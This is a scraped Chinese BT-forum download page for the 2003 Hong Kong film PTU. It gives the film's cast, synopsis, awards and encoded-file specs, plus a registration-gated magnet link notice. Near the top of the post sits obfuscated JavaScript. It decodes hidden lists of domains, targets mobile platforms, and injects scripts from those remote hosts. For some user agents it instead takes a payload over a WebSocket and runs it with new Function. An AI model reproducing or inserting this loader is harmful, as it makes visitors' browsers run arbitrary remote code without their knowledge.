机动部队[国粤语音轨/中文字幕].PTU.2003.1080p.迅雷下载 9.09GB

版主小s 1月前 313

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 机动部队 / PTU: Into the Perilous Night / PTU - Police Tactical Unit

◎片 名 PTU

◎年 代 2003

◎产 地 中国香港

◎类 别 剧情 / 犯罪

◎语 言 粤语

◎上映日期 2003-04-17(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt0250638/

◎豆瓣评分 8.1/10 (74305人评价)

◎豆瓣链接 https://movie.douban.com/subject/1302434/

◎片 长 88分钟

◎导 演 杜琪峰 Johnnie To (id:1160186)

◎编 剧 欧健儿 Kin-Yee Au (id:1303521)

游乃海 Nai-Hoi Yau (id:1161310)

◎演 员 任达华 Simon Yam (id:1031194)

邵美琪 Maggie Siu (id:1152997)

林雪 Suet Lam (id:1274279)

黄卓玲 Ruby Wong (id:1301203)

黄浩然 Raymond Wong Ho-Yin (id:1051740)

高雄 Eddy Ko (id:1313798)

卢海鹏 Hoi-Pang Lo (id:1038772)

张志平 Chi Ping Chang (id:1364462)

赵珉和 Tamiyasu Cho (id:1275802)

赵志诚 Chiu Chi Shing (id:1326360)

张满源 Kenneth Cheung (id:1342531)

元宝 Bo Yuen (id:1346065)

黄志伟 Chi Wai Wong (id:1308890)

利沙华 Courtney Wu (id:1034049)

郑保瑞 Pou-Soi Cheang (id:1274240)

王天林 Tian-lin Wang (id:1041074)

丁云山 Wan San Ding (id:1388181)

杜琪峰 Johnnie To (id:1160186)

钟志荣 Chi Wing Chung (id:1280782)

郑兆强 Siu-keung Cheng (id:1280597)

罗永昌 Wing-cheong Law (id:1274489)

叶淑华 Sukie Yip (id:1305548)

罗永昌 Wing-cheong Law (id:1274489)

马文现 Stephen Ma (id:1290573)

黄华和 Wah Wo Wong (id:1355706)

◎标 签 杜琪峰 / 香港 / 银河映像 / 警匪 / 香港电影 / 任达华 / 黑帮 / 犯罪

◎简 介

反黑组警长肥沙(林雪饰),不慎丢失手枪。这件事非同小可,如果手枪被匪徒用去行凶,肥沙将大祸临头。PTU(警察机动部队)警官何文展(任达华饰)出于义气,答应一定会在天亮之前寻回手枪,带几名手下开展了寻枪行动。另一方面,却在横生枝节:警员Kat(邵美琪饰)死守纪律,坚持要将此事汇报上级处理;而在同一晚,CID的Madam张(黄卓玲饰)在接手一单黑社会谋杀案时,怀疑肥沙与黑社会有染,由此与PTU发生意见分歧。人与人,部门与部门之间的矛盾、争斗和角力,在夜幕中徐徐拉开。而第二天清早,揭晓的真相,原来都在他们的意料之外……

◎获奖情况 (共28项)

第40届台北金马影展 (2003)

金马奖 最佳剧情片(提名)

金马奖 最佳导演(提名)

└──杜琪峰 (id:1160186)

金马奖 最佳男主角(提名)

└──任达华 (id:1031194)

金马奖 最佳男配角(提名)

└──林雪 (id:1274279)

金马奖 最佳原著剧本

└──欧健儿 (id:1303521)

└──游乃海 (id:1161310)

金马奖 最佳摄影(提名)

└──郑兆强 (id:1280597)

金马奖 最佳造型设计(提名)

└──叶淑华 (id:1305548)

金马奖 最佳原创配乐(提名)

└──钟志荣 (id:1280782)

金马奖 最佳剪辑(提名)

└──罗永昌 (id:1274489)

金马奖 最佳音效(提名)

└──卓保怡 (id:1280497)

金马奖 最佳视觉效果(提名)

└──马文现 (id:1290573)

第23届香港电影金像奖 (2004)

最佳电影(提名)

最佳导演

└──杜琪峰 (id:1160186)

最佳编剧(提名)

└──欧健儿 (id:1303521)

└──游乃海 (id:1161310)

最佳男主角(提名)

└──任达华 (id:1031194)

最佳女配角(提名)

└──邵美琪 (id:1152997)

最佳摄影(提名)

└──郑兆强 (id:1280597)

最佳剪接(提名)

└──罗永昌 (id:1274489)

最佳原创电影音乐(提名)

└──钟志荣 (id:1280782)

最佳音响效果(提名)

└──卓保怡 (id:1280497)

最佳视觉效果(提名)

└──马文现 (id:1290573)

第7届中国长春电影节 (2005)

金鹿奖 最佳华语故事片(提名)

金鹿奖 最佳导演(提名)

└──杜琪峰 (id:1160186)

第4届华语电影传媒大奖 (2004)

最佳电影(提名)

最佳导演

└──杜琪峰 (id:1160186)

最佳男主角(提名)

└──任达华 (id:1031194)

最佳女配角(提名)

└──邵美琪 (id:1152997)

最佳编剧(提名)

└──欧健儿 (id:1303521)

└──游乃海 (id:1161310)

  1. General

  2. Unique ID : 202948278505106134156885908480002089794 (0x98AE6AAB1D0426D997647EB1F8B7E342)

  3. Complete name : PTU.2003.1080p.BluRay.DTS.2Audio.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 9.08 GiB

  7. Duration : 1 h 28 min

  8. Overall bit rate : 14.8 Mb/s

  9. Movie name : PTU 2003 1080p BluRay DTS 2Audio x265-10bit-HDS

  10. Encoded date : UTC 2021-06-29 05:00:03

  11. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  12. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 28 min

  20. Bit rate : 12.6 Mb/s

  21. Width : 1 920 pixels

  22. Height : 816 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.335

  30. Stream size : 7.75 GiB (85%)

  31. Title : @HDSky

  32. Writing library : x265 - H.265/HEVC codec

  33. Encoding settings : de / tmvp / b-intra / lslices=4 / deblock(tC=-1:B=-1)

  34. Default : Yes

  35. Forced : No


  36. Audio #1

  37. ID : 2

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 28 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 951 MiB (10%)

  51. Title : Cantonese

  52. Language : Chinese

  53. Default : Yes

  54. Forced : No


  55. Audio #2

  56. ID : 3

  57. Format : AC-3

  58. Format/Info : Audio Coding 3

  59. Commercial name : Dolby Digital

  60. Codec ID : A_AC3

  61. Duration : 1 h 28 min

  62. Bit rate mode : Constant

  63. Bit rate : 640 kb/s

  64. Channel(s) : 6 channels

  65. Channel layout : L R C LFE Ls Rs

  66. Sampling rate : 48.0 kHz

  67. Frame rate : 31.250 FPS (1536 SPF)

  68. Compression mode : Lossy

  69. Stream size : 403 MiB (4%)

  70. Title : Mandarin

  71. Language : Chinese

  72. Service kind : Complete Main

  73. Default : No

  74. Forced : No


  75. Text #1

  76. ID : 4

  77. Format : PGS

  78. Muxing mode : zlib

  79. Codec ID : S_HDMV/PGS

  80. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  81. Duration : 1 h 23 min

  82. Bit rate : 11.8 kb/s

  83. Count of elements : 1057

  84. Stream size : 7.09 MiB (0%)

  85. Title : CHT

  86. Language : Chinese

  87. Default : Yes

  88. Forced : No


  89. Text #2

  90. ID : 5

  91. Format : PGS

  92. Muxing mode : zlib

  93. Codec ID : S_HDMV/PGS

  94. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  95. Duration : 1 h 23 min

  96. Bit rate : 11.5 kb/s

  97. Count of elements : 1057

  98. Stream size : 6.90 MiB (0%)

  99. Title : CHS

  100. Language : Chinese

  101. Default : No

  102. Forced : No


  103. Menu

  104. 00:00:00.000 : en:Chapter 01

  105. 00:03:54.500 : en:Chapter 02

  106. 00:06:17.792 : en:Chapter 03

  107. 00:09:34.958 : en:Chapter 04

  108. 00:11:24.833 : en:Chapter 05

  109. 00:14:15.500 : en:Chapter 06

  110. 00:18:58.417 : en:Chapter 07

  111. 00:24:21.167 : en:Chapter 08

  112. 00:26:07.833 : en:Chapter 09

  113. 00:30:38.000 : en:Chapter 10

  114. 00:34:57.417 : en:Chapter 11

  115. 00:37:15.375 : en:Chapter 12

  116. 00:41:57.167 : en:Chapter 13

  117. 00:44:55.208 : en:Chapter 14

  118. 00:50:17.500 : en:Chapter 15

  119. 00:55:16.000 : en:Chapter 16

  120. 00:59:42.042 : en:Chapter 17

  121. 01:02:21.000 : en:Chapter 18

  122. 01:05:03.000 : en:Chapter 19

  123. 01:07:13.500 : en:Chapter 20

  124. 01:10:39.667 : en:Chapter 21

  125. 01:14:35.875 : en:Chapter 22

  126. 01:17:57.500 : en:Chapter 23

  127. 01:21:23.167 : en:Chapter 24

  128. 01:23:55.500 : en:Chapter 25




此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 剧情 犯罪

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (1)

你可以在 登录 or 注册 后,对此帖发表评论!

返回